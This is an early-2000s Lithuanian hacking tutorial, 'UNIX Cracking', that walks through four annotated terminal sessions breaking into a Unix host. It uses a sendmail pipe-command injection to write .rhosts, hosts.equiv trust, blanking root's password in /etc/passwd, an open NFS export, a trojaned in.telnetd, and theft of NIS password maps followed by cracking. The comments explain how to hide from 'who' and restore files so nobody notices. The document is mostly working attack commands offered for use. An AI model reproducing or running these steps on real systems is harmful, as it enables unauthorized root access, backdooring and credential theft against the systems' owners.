9. UNIX Cracking
Pvz No1.
crack% telnet target.remote.com 25
Connecting to 123.456.654.321.
! prisijungiam prie 25 porto - tai SMTP
220 sendmail SMI/4.3.5.2 ready
! versija kaip zhinome turi buga.
helo xxx
220 Helo xxx, ( crack.edu )
mail from: |echo crack.edu/.rhosts@target.remote.com
! statome komanda vietoj atgalinio adreso.
200 Sender ok.
rcpt to: nosuchuser
! ivedam ishanxto neteisinga adresata
500 nosuchuser: user unknown
! nekreipdami demesio i praneshima tesiame dialoga .
datã
230 Enter mail, end with .
200 Mail accepted
! viskas mashina nulauzhta....
quit̃
crack% su
! dabar ilendam taip kad musu nebutu matyti per who
# rsh target.remote.com /bin/csh -i
Welcome to remote.com!
Warning! No access to terminal, job control disabled!
target#
Pvz No2.
crack# su - bin
$ rsh target.remote.com /bin/csh -i
! Faile /etc/hosts.equiv yra uzhrashas + ir klaida...
Welcome to remote.com!
! Katalogas /etc su savininku bin...
Warning! No access to terminal, job control disabled!
% ls -ldg /etc
drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/
% cd /etc
! Darom kad mums galima butu editinfi passwd ...
% mv passwd passwd.was
% cp passwd.was passwd
! redaguojam
% ed passwd
2341̃
1p
root:Nkkh5gkljGyj:0:0:Root:/:/bin/csh
s/Nkkh5gkljGyj//p
root::0:0:Root:/:/bin/csh
w
2341
q
! Ir super useryje.
%echo /bin/csh -i | su root
Warning! No access to terminal, job control disabled!
target# mv /etc/passwd.was /etc/passwd
! Kad niekas nepastebetu ka mes dareme.
Pvz No3.
crack% showmount -e target.remote.com
Export list for target.remote.com
/home Everyone
/disk3 neptun pluton alpha
! Domeininej katalogaj prieinami per NFS
crack% su
# mount -t nfs target.remote.com:/home /mnt
# cd /mnt
! Mountinam kataloga sau
# ls -ldg *
drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/
# echo crack.edũ user/.rhosts
! Idiegiam .rhosts pas pas userius
# cat̃ /etc/passwd̃
user::257:20::/:
^D̃
! sukuriam toki pati pas mumi
# su - user̃
! Tampam juo
$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
!Ir einam i svechius -)
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc
! Katalogas prieinamas writinimuj
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd in.telnetd
!Radom programike kuri pasileis
!per roota ish musu katalogo
% cd /usr/etc
% mv in.telnetd in.telnetd1
! sukuriam trojana
% cat̃ in.telnetd
#!/bin/sh
exec /bin/csh -i
^D
% chmod 755 in.telnetd
! ir paleidzhiam ji
% telnet 127.1
Connecting 127.1.
Warning! No access to terminal, job control disabled!
# chown user /etc;
! Darom /etc savu
^M: command not found
# exit;
^M: command not found
Connection closed by foreign host.
% cd /etc
! o toliau kaip in Pvz No1.
........
Pvz No4.
! chekinam ar yra NIS ̃
crack% rpcinfo -p target.remote.com | grep bind
120000 2 udp 2493 ypbind
! yra toxaj ....
crack% ypx -o target.passwd -g target.remote.com
! pasimam paswordu faila
crack% crack target.passwd
! leidzhiam passwd ieshkokli
[ a lot of time ]
OK, user user has password iamuser
! radom, uzheinam
crack% telnet target.remote.com
! toliau viska kaip kad prieshtai buvusiam pvz .
......
- Hex -
(imti pvz, versta, kurta , bla bla bla rezultatas priesh akis)
Shitie budai yra pakankamai seni ir vieni ish primytiviausiu bet ...
heh
susipazhinkit su principu nes yra tokiu kurie net neisivaizduoja kaip
yra
daromi tokie darbai ir uzhduoda tokius klausimus ... mazhdaug su kokia
programele tu crackini ? ;\
Informacion rulez and if u rule information .....
® 2002-2003 VaidaZ